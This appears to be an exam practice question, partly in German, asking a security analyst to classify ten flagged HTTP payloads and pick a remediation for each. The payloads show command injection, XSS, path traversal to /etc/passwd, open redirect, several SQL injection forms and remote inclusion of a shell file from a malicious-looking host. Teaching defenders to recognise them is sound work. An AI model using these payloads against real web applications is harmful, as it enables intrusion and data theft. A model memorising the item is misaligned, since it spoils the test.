PBQ 1: HTTP Request Payload Table

10 HTTP-Payloads analysieren • Vulnerability-Typ + Remediation zuordnen

HOTSPOT

HOTSPOT - You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTION - Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. Für jeden HTTP-Payload: Wähle den korrekten Angriffstyp UND die passende Behebungsmaßnahme. Achte auf URL-Encoding und SQL-Syntax.

HTTP Request Payloads

Vulnerability Type

Remediation

lookup=$(whoami)

search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e

URL decoded: search=Bob"><img src=a onerror=alert(1)>

logfile=%2fetc%2fpasswd%00

URL decoded: logfile=/etc/passwd

#inner-tab"><script>alert(1)</script>

site=www.exa'ping%20-c%2010%20localhost'mple.com

URL decoded: site=www.exa'ping -c 10 localhost'mple.com

redir=http:%2f%2fwww.malicious-site.com

URL decoded: redir=http://www.malicious-site.com

item=widget';waitfor%20delay%20'00:00:20';--

URL decoded: item=widget';waitfor delay '00:00:20';--

item=widget%20union%20select%20null,null,@@version;--

URL decoded: item=widget union select null,null,@@version;--

item=widget'+convert(int,@@version)+'

logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt

URL decoded: logFile=http://www.malicious-site.com/shell.txt